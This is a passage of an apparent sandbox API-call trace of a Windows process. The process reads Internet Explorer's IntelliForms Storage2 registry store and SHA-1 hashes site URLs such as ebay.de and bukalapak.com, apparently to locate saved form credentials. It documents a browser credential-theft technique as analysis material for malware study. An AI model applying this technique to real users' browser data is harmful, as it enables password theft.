_Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="12") returned 2 [0249.343] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865B6B680960B") returned 38 [0249.343] lstrlenW (lpString="12") returned 2 [0249.343] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67300 [0249.343] lstrcpyW (in: lpString1=0x5d67300, lpString2="0ED6B35808EC1E9F20B49DAB4865B6B680960B" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B") returned="0ED6B35808EC1E9F20B49DAB4865B6B680960B" [0249.343] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B", lpString2="12" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B12") returned="0ED6B35808EC1E9F20B49DAB4865B6B680960B12" [0249.344] LocalFree (hMem=0x5d67220) returned 0x0 [0249.344] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="08") returned 2 [0249.344] lstrlenW (lpString="0ED6B35808EC1E9F20B49DAB4865B6B680960B12") returned 40 [0249.344] lstrlenW (lpString="08") returned 2 [0249.344] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d66ce0 [0249.344] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="0ED6B35808EC1E9F20B49DAB4865B6B680960B12" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B12") returned="0ED6B35808EC1E9F20B49DAB4865B6B680960B12" [0249.344] lstrcatW (in: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B12", lpString2="08" | out: lpString1="0ED6B35808EC1E9F20B49DAB4865B6B680960B1208") returned="0ED6B35808EC1E9F20B49DAB4865B6B680960B1208" [0249.344] LocalFree (hMem=0x5d67300) returned 0x0 [0249.344] CryptDestroyHash (hHash=0x5d9e630) returned 1 [0249.344] CryptReleaseContext (hProv=0x5d38e10, dwFlags=0x0) returned 1 [0249.344] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.344] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.344] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.344] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.344] RegEnumValueW (in: hKey=0x94c, dwIndex=0x3, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url20", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.344] StrStrIW (lpFirst="ebay.de", lpSrch="?") returned 0x0 [0249.344] StrStrIW (lpFirst="ebay.de", lpSrch="http://") returned 0x0 [0249.344] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37c10) returned 1 [0249.344] CryptCreateHash (in: hProv=0x5d37c10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.344] lstrlenW (lpString="ebay.de") returned 7 [0249.344] CryptHashData (hHash=0x5d9e550, pbData=0x43ed4e0, dwDataLen=0x10, dwFlags=0x0) returned 1 [0249.344] CryptGetHashParam (in: hHash=0x5d9e550, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.344] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A8") returned 2 [0249.345] lstrlenW (lpString="") returned 0 [0249.345] lstrlenW (lpString="A8") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b32f0 [0249.345] lstrcpyW (in: lpString1=0xd1b32f0, lpString2="" | out: lpString1="") returned="" [0249.345] lstrcatW (in: lpString1="", lpString2="A8" | out: lpString1="A8") returned="A8" [0249.345] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="90") returned 2 [0249.345] lstrlenW (lpString="A8") returned 2 [0249.345] lstrlenW (lpString="90") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.345] lstrcpyW (in: lpString1=0x5d33770, lpString2="A8" | out: lpString1="A8") returned="A8" [0249.345] lstrcatW (in: lpString1="A8", lpString2="90" | out: lpString1="A890") returned="A890" [0249.345] LocalFree (hMem=0xd1b32f0) returned 0x0 [0249.345] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="57") returned 2 [0249.345] lstrlenW (lpString="A890") returned 4 [0249.345] lstrlenW (lpString="57") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.345] lstrcpyW (in: lpString1=0x5d33950, lpString2="A890" | out: lpString1="A890") returned="A890" [0249.345] lstrcatW (in: lpString1="A890", lpString2="57" | out: lpString1="A89057") returned="A89057" [0249.345] LocalFree (hMem=0x5d33770) returned 0x0 [0249.345] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="73") returned 2 [0249.345] lstrlenW (lpString="A89057") returned 6 [0249.345] lstrlenW (lpString="73") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33770 [0249.345] lstrcpyW (in: lpString1=0x5d33770, lpString2="A89057" | out: lpString1="A89057") returned="A89057" [0249.345] lstrcatW (in: lpString1="A89057", lpString2="73" | out: lpString1="A8905773") returned="A8905773" [0249.345] LocalFree (hMem=0x5d33950) returned 0x0 [0249.345] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8F") returned 2 [0249.345] lstrlenW (lpString="A8905773") returned 8 [0249.345] lstrlenW (lpString="8F") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33950 [0249.345] lstrcpyW (in: lpString1=0x5d33950, lpString2="A8905773" | out: lpString1="A8905773") returned="A8905773" [0249.345] lstrcatW (in: lpString1="A8905773", lpString2="8F" | out: lpString1="A89057738F") returned="A89057738F" [0249.345] LocalFree (hMem=0x5d33770) returned 0x0 [0249.345] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="43") returned 2 [0249.345] lstrlenW (lpString="A89057738F") returned 10 [0249.345] lstrlenW (lpString="43") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d00d0 [0249.345] lstrcpyW (in: lpString1=0xd1d00d0, lpString2="A89057738F" | out: lpString1="A89057738F") returned="A89057738F" [0249.345] lstrcatW (in: lpString1="A89057738F", lpString2="43" | out: lpString1="A89057738F43") returned="A89057738F43" [0249.345] LocalFree (hMem=0x5d33950) returned 0x0 [0249.345] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D9") returned 2 [0249.345] lstrlenW (lpString="A89057738F43") returned 12 [0249.345] lstrlenW (lpString="D9") returned 2 [0249.345] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1cfcb0 [0249.345] lstrcpyW (in: lpString1=0xd1cfcb0, lpString2="A89057738F43" | out: lpString1="A89057738F43") returned="A89057738F43" [0249.345] lstrcatW (in: lpString1="A89057738F43", lpString2="D9" | out: lpString1="A89057738F43D9") returned="A89057738F43D9" [0249.345] LocalFree (hMem=0xd1d00d0) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8F") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D9") returned 14 [0249.346] lstrlenW (lpString="8F") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cf730 [0249.346] lstrcpyW (in: lpString1=0xd1cf730, lpString2="A89057738F43D9" | out: lpString1="A89057738F43D9") returned="A89057738F43D9" [0249.346] lstrcatW (in: lpString1="A89057738F43D9", lpString2="8F" | out: lpString1="A89057738F43D98F") returned="A89057738F43D98F" [0249.346] LocalFree (hMem=0xd1cfcb0) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EC") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D98F") returned 16 [0249.346] lstrlenW (lpString="EC") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cf680 [0249.346] lstrcpyW (in: lpString1=0xd1cf680, lpString2="A89057738F43D98F" | out: lpString1="A89057738F43D98F") returned="A89057738F43D98F" [0249.346] lstrcatW (in: lpString1="A89057738F43D98F", lpString2="EC" | out: lpString1="A89057738F43D98FEC") returned="A89057738F43D98FEC" [0249.346] LocalFree (hMem=0xd1cf730) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="27") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D98FEC") returned 18 [0249.346] lstrlenW (lpString="27") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217db0 [0249.346] lstrcpyW (in: lpString1=0xd217db0, lpString2="A89057738F43D98FEC" | out: lpString1="A89057738F43D98FEC") returned="A89057738F43D98FEC" [0249.346] lstrcatW (in: lpString1="A89057738F43D98FEC", lpString2="27" | out: lpString1="A89057738F43D98FEC27") returned="A89057738F43D98FEC27" [0249.346] LocalFree (hMem=0xd1cf680) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8A") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D98FEC27") returned 20 [0249.346] lstrlenW (lpString="8A") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217c30 [0249.346] lstrcpyW (in: lpString1=0xd217c30, lpString2="A89057738F43D98FEC27" | out: lpString1="A89057738F43D98FEC27") returned="A89057738F43D98FEC27" [0249.346] lstrcatW (in: lpString1="A89057738F43D98FEC27", lpString2="8A" | out: lpString1="A89057738F43D98FEC278A") returned="A89057738F43D98FEC278A" [0249.346] LocalFree (hMem=0xd217db0) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CB") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D98FEC278A") returned 22 [0249.346] lstrlenW (lpString="CB") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217570 [0249.346] lstrcpyW (in: lpString1=0xd217570, lpString2="A89057738F43D98FEC278A" | out: lpString1="A89057738F43D98FEC278A") returned="A89057738F43D98FEC278A" [0249.346] lstrcatW (in: lpString1="A89057738F43D98FEC278A", lpString2="CB" | out: lpString1="A89057738F43D98FEC278ACB") returned="A89057738F43D98FEC278ACB" [0249.346] LocalFree (hMem=0xd217c30) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="72") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D98FEC278ACB") returned 24 [0249.346] lstrlenW (lpString="72") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217b70 [0249.346] lstrcpyW (in: lpString1=0xd217b70, lpString2="A89057738F43D98FEC278ACB" | out: lpString1="A89057738F43D98FEC278ACB") returned="A89057738F43D98FEC278ACB" [0249.346] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB", lpString2="72" | out: lpString1="A89057738F43D98FEC278ACB72") returned="A89057738F43D98FEC278ACB72" [0249.346] LocalFree (hMem=0xd217570) returned 0x0 [0249.346] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4C") returned 2 [0249.346] lstrlenW (lpString="A89057738F43D98FEC278ACB72") returned 26 [0249.346] lstrlenW (lpString="4C") returned 2 [0249.346] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214660 [0249.347] lstrcpyW (in: lpString1=0xd214660, lpString2="A89057738F43D98FEC278ACB72" | out: lpString1="A89057738F43D98FEC278ACB72") returned="A89057738F43D98FEC278ACB72" [0249.347] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB72", lpString2="4C" | out: lpString1="A89057738F43D98FEC278ACB724C") returned="A89057738F43D98FEC278ACB724C" [0249.347] LocalFree (hMem=0xd217b70) returned 0x0 [0249.347] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5B") returned 2 [0249.347] lstrlenW (lpString="A89057738F43D98FEC278ACB724C") returned 28 [0249.347] lstrlenW (lpString="5B") returned 2 [0249.347] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215f90 [0249.347] lstrcpyW (in: lpString1=0xd215f90, lpString2="A89057738F43D98FEC278ACB724C" | out: lpString1="A89057738F43D98FEC278ACB724C") returned="A89057738F43D98FEC278ACB724C" [0249.347] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C", lpString2="5B" | out: lpString1="A89057738F43D98FEC278ACB724C5B") returned="A89057738F43D98FEC278ACB724C5B" [0249.347] LocalFree (hMem=0xd214660) returned 0x0 [0249.347] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="36") returned 2 [0249.347] lstrlenW (lpString="A89057738F43D98FEC278ACB724C5B") returned 30 [0249.347] lstrlenW (lpString="36") returned 2 [0249.347] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215ec0 [0249.347] lstrcpyW (in: lpString1=0xd215ec0, lpString2="A89057738F43D98FEC278ACB724C5B" | out: lpString1="A89057738F43D98FEC278ACB724C5B") returned="A89057738F43D98FEC278ACB724C5B" [0249.347] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C5B", lpString2="36" | out: lpString1="A89057738F43D98FEC278ACB724C5B36") returned="A89057738F43D98FEC278ACB724C5B36" [0249.347] LocalFree (hMem=0xd215f90) returned 0x0 [0249.347] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="93") returned 2 [0249.347] lstrlenW (lpString="A89057738F43D98FEC278ACB724C5B36") returned 32 [0249.347] lstrlenW (lpString="93") returned 2 [0249.347] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215020 [0249.347] lstrcpyW (in: lpString1=0xd215020, lpString2="A89057738F43D98FEC278ACB724C5B36" | out: lpString1="A89057738F43D98FEC278ACB724C5B36") returned="A89057738F43D98FEC278ACB724C5B36" [0249.347] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C5B36", lpString2="93" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693") returned="A89057738F43D98FEC278ACB724C5B3693" [0249.347] LocalFree (hMem=0xd215ec0) returned 0x0 [0249.347] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FB") returned 2 [0249.347] lstrlenW (lpString="A89057738F43D98FEC278ACB724C5B3693") returned 34 [0249.347] lstrlenW (lpString="FB") returned 2 [0249.347] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67e60 [0249.347] lstrcpyW (in: lpString1=0x5d67e60, lpString2="A89057738F43D98FEC278ACB724C5B3693" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693") returned="A89057738F43D98FEC278ACB724C5B3693" [0249.347] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C5B3693", lpString2="FB" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FB") returned="A89057738F43D98FEC278ACB724C5B3693FB" [0249.347] LocalFree (hMem=0xd215020) returned 0x0 [0249.347] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E1") returned 2 [0249.347] lstrlenW (lpString="A89057738F43D98FEC278ACB724C5B3693FB") returned 36 [0249.347] lstrlenW (lpString="E1") returned 2 [0249.347] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67840 [0249.347] lstrcpyW (in: lpString1=0x5d67840, lpString2="A89057738F43D98FEC278ACB724C5B3693FB" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FB") returned="A89057738F43D98FEC278ACB724C5B3693FB" [0249.347] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C5B3693FB", lpString2="E1" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1") returned="A89057738F43D98FEC278ACB724C5B3693FBE1" [0249.347] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.347] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FD") returned 2 [0249.347] lstrlenW (lpString="A89057738F43D98FEC278ACB724C5B3693FBE1") returned 38 [0249.347] lstrlenW (lpString="FD") returned 2 [0249.347] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67f40 [0249.348] lstrcpyW (in: lpString1=0x5d67f40, lpString2="A89057738F43D98FEC278ACB724C5B3693FBE1" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1") returned="A89057738F43D98FEC278ACB724C5B3693FBE1" [0249.348] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1", lpString2="FD" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1FD") returned="A89057738F43D98FEC278ACB724C5B3693FBE1FD" [0249.348] LocalFree (hMem=0x5d67840) returned 0x0 [0249.348] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5F") returned 2 [0249.348] lstrlenW (lpString="A89057738F43D98FEC278ACB724C5B3693FBE1FD") returned 40 [0249.348] lstrlenW (lpString="5F") returned 2 [0249.348] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67220 [0249.348] lstrcpyW (in: lpString1=0x5d67220, lpString2="A89057738F43D98FEC278ACB724C5B3693FBE1FD" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1FD") returned="A89057738F43D98FEC278ACB724C5B3693FBE1FD" [0249.348] lstrcatW (in: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1FD", lpString2="5F" | out: lpString1="A89057738F43D98FEC278ACB724C5B3693FBE1FD5F") returned="A89057738F43D98FEC278ACB724C5B3693FBE1FD5F" [0249.348] LocalFree (hMem=0x5d67f40) returned 0x0 [0249.348] CryptDestroyHash (hHash=0x5d9e550) returned 1 [0249.348] CryptReleaseContext (hProv=0x5d37c10, dwFlags=0x0) returned 1 [0249.348] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.348] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.348] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.348] LocalFree (hMem=0x5d67220) returned 0x0 [0249.348] RegEnumValueW (in: hKey=0x94c, dwIndex=0x4, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url19", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.348] StrStrIW (lpFirst="bukalapak.com", lpSrch="?") returned 0x0 [0249.348] StrStrIW (lpFirst="bukalapak.com", lpSrch="http://") returned 0x0 [0249.348] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d36f10) returned 1 [0249.348] CryptCreateHash (in: hProv=0x5d36f10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.348] lstrlenW (lpString="bukalapak.com") returned 13 [0249.349] CryptHashData (hHash=0x5d9d8a0, pbData=0x43ed4e0, dwDataLen=0x1c, dwFlags=0x0) returned 1 [0249.349] CryptGetHashParam (in: hHash=0x5d9d8a0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6D") returned 2 [0249.349] lstrlenW (lpString="") returned 0 [0249.349] lstrlenW (lpString="6D") returned 2 [0249.349] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b35c0 [0249.349] lstrcpyW (in: lpString1=0xd1b35c0, lpString2="" | out: lpString1="") returned="" [0249.349] lstrcatW (in: lpString1="", lpString2="6D" | out: lpString1="6D") returned="6D" [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="26") returned 2 [0249.349] lstrlenW (lpString="6D") returned 2 [0249.349] lstrlenW (lpString="26") returned 2 [0249.349] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.349] lstrcpyW (in: lpString1=0x5d33db0, lpString2="6D" | out: lpString1="6D") returned="6D" [0249.349] lstrcatW (in: lpString1="6D", lpString2="26" | out: lpString1="6D26") returned="6D26" [0249.349] LocalFree (hMem=0xd1b35c0) returned 0x0 [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DB") returned 2 [0249.349] lstrlenW (lpString="6D26") returned 4 [0249.349] lstrlenW (lpString="DB") returned 2 [0249.349] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33770 [0249.349] lstrcpyW (in: lpString1=0x5d33770, lpString2="6D26" | out: lpString1="6D26") returned="6D26" [0249.349] lstrcatW (in: lpString1="6D26", lpString2="DB" | out: lpString1="6D26DB") returned="6D26DB" [0249.349] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F7") returned 2 [0249.349] lstrlenW (lpString="6D26DB") returned 6 [0249.349] lstrlenW (lpString="F7") returned 2 [0249.349] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.349] lstrcpyW (in: lpString1=0x5d33db0, lpString2="6D26DB" | out: lpString1="6D26DB") returned="6D26DB" [0249.349] lstrcatW (in: lpString1="6D26DB", lpString2="F7" | out: lpString1="6D26DBF7") returned="6D26DBF7" [0249.349] LocalFree (hMem=0x5d33770) returned 0x0 [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C1") returned 2 [0249.349] lstrlenW (lpString="6D26DBF7") returned 8 [0249.349] lstrlenW (lpString="C1") returned 2 [0249.349] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33770 [0249.349] lstrcpyW (in: lpString1=0x5d33770, lpString2="6D26DBF7" | out: lpString1="6D26DBF7") returned="6D26DBF7" [0249.349] lstrcatW (in: lpString1="6D26DBF7", lpString2="C1" | out: lpString1="6D26DBF7C1") returned="6D26DBF7C1" [0249.349] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5D") returned 2 [0249.349] lstrlenW (lpString="6D26DBF7C1") returned 10 [0249.349] lstrlenW (lpString="5D") returned 2 [0249.349] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0700 [0249.349] lstrcpyW (in: lpString1=0xd1d0700, lpString2="6D26DBF7C1" | out: lpString1="6D26DBF7C1") returned="6D26DBF7C1" [0249.349] lstrcatW (in: lpString1="6D26DBF7C1", lpString2="5D" | out: lpString1="6D26DBF7C15D") returned="6D26DBF7C15D" [0249.349] LocalFree (hMem=0x5d33770) returned 0x0 [0249.349] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0B") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D") returned 12 [0249.350] lstrlenW (lpString="0B") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0910 [0249.350] lstrcpyW (in: lpString1=0xd1d0910, lpString2="6D26DBF7C15D" | out: lpString1="6D26DBF7C15D") returned="6D26DBF7C15D" [0249.350] lstrcatW (in: lpString1="6D26DBF7C15D", lpString2="0B" | out: lpString1="6D26DBF7C15D0B") returned="6D26DBF7C15D0B" [0249.350] LocalFree (hMem=0xd1d0700) returned 0x0 [0249.350] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="3B") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D0B") returned 14 [0249.350] lstrlenW (lpString="3B") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cf940 [0249.350] lstrcpyW (in: lpString1=0xd1cf940, lpString2="6D26DBF7C15D0B" | out: lpString1="6D26DBF7C15D0B") returned="6D26DBF7C15D0B" [0249.350] lstrcatW (in: lpString1="6D26DBF7C15D0B", lpString2="3B" | out: lpString1="6D26DBF7C15D0B3B") returned="6D26DBF7C15D0B3B" [0249.350] LocalFree (hMem=0xd1d0910) returned 0x0 [0249.350] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="17") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D0B3B") returned 16 [0249.350] lstrlenW (lpString="17") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0ff0 [0249.350] lstrcpyW (in: lpString1=0xd1d0ff0, lpString2="6D26DBF7C15D0B3B" | out: lpString1="6D26DBF7C15D0B3B") returned="6D26DBF7C15D0B3B" [0249.350] lstrcatW (in: lpString1="6D26DBF7C15D0B3B", lpString2="17" | out: lpString1="6D26DBF7C15D0B3B17") returned="6D26DBF7C15D0B3B17" [0249.350] LocalFree (hMem=0xd1cf940) returned 0x0 [0249.350] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="00") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D0B3B17") returned 18 [0249.350] lstrlenW (lpString="00") returned 2 [0249.350] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2168b0 [0249.350] lstrcpyW (in: lpString1=0xd2168b0, lpString2="6D26DBF7C15D0B3B17" | out: lpString1="6D26DBF7C15D0B3B17") returned="6D26DBF7C15D0B3B17" [0249.350] lstrcatW (in: lpString1="6D26DBF7C15D0B3B17", lpString2="00" | out: lpString1="6D26DBF7C15D0B3B1700") returned="6D26DBF7C15D0B3B1700" [0249.350] LocalFree (hMem=0xd1d0ff0) returned 0x0 [0249.350] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D8") returned 2 [0249.350] lstrlenW (lpString="6D26DBF7C15D0B3B1700") returned 20 [0249.350] lstrlenW 